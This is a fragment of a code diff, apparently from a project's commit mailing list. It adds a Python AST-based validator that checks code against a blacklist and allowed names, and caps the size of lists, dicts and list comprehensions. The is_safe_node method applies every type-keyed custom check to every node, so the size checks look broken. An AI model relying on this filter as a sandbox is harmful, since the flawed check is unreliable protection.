+        return all(alias.name not in self.blacklist and not 
alias.name.startswith('_') for alias in node.names)
+
+    def _check_subscript(self, node):
+        """Check if a subscript operation is safe."""
+        if isinstance(node.value, ast.Name):
+            return node.value.id not in self.blacklist
+        elif isinstance(node.value, ast.Attribute):
+            return self._check_attribute(node.value)
+        return True
+
+    def _check_module(self, node):
+        """Check if a module is safe by examining its contents."""
+        for stmt in node.body:
+            if isinstance(stmt, (ast.Import, ast.ImportFrom)):
+                if isinstance(stmt, ast.Import):
+                    if not self._check_import(stmt):
+                        return False
+                else:
+                    if not self._check_importfrom(stmt):
+                        return False
+            elif isinstance(stmt, ast.Expr):
+                if not self.is_safe_node(stmt.value):
+                    return False
+        return True
+
+    def _get_attribute_name(self, node):
+        """Get the full name of an attribute."""
+        if isinstance(node.value, ast.Name):
+            return "{}.{}".format(node.value.id,node.attr)
+        elif isinstance(node.value, ast.Attribute):
+            return 
"{}.{}".format(self._get_attribute_name(node.value),node.attr)
+        return node.attr
+
+    def is_safe_node(self, node):
+        """Check if a node and all its children are safe."""
+        for check_func in self.custom_checks().values():
+            if not check_func(node):
+                return False
+        for child in ast.iter_child_nodes(node):
+            if not self.is_safe_node(child):
+                return False
+        return True
+
+class CustomRule(RuleTemplate):
+    """
+    A custom rule implementation that allows specific constructs and provides
+    custom checks for list comprehensions and container sizes.
+    """
+
+    def allowed_names(self):
+        """Return a set of allowed variable names."""
+        return {'custom_var', 'another_var', 'x'}  # 'x' added for list 
comprehension
+
+    def allowed_functions(self):
+        """Return a set of allowed function names."""
+        return {'safe_function', 'range'}  # 'range' added for list 
comprehension
+
+    def allowed_node_types(self):
+        """Return a set of allowed AST node types."""
+        return {
+            ast.List, ast.Dict, ast.ListComp, ast.comprehension,
+            ast.Compare, ast.BinOp, ast.BoolOp, ast.And, ast.Or,
+            ast.Eq, ast.Gt, ast.Lt, ast.Mod,
+            ast.Name, ast.Load, ast.Store, ast.Call, ast.Constant
+        }
+
+    def custom_checks(self):
+        return {
+            ast.List: lambda node: len(node.elts) <= 10,
+            ast.Dict: lambda node: len(node.keys) <= 5,
+            ast.ListComp: self._check_list_comp
+        }
+
+    def _check_list_comp(self, node):
+        # Check if the list comprehension would produce at most 10 elements
+        if isinstance(node.generators[0].iter, ast.Call) and \
+          isinstance(node.generators[0].iter.func, ast.Name) and \
+          node.generators[0].iter.func.id == 'range':
+            range_arg = node.generators[0].iter.args[0]
+            if isinstance(range_arg, ast.Constant):
+                return range_arg.value <= 10
+        return False  # If we can't determine the size, consider it unsafe
+
+
+


---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]


Reply via email to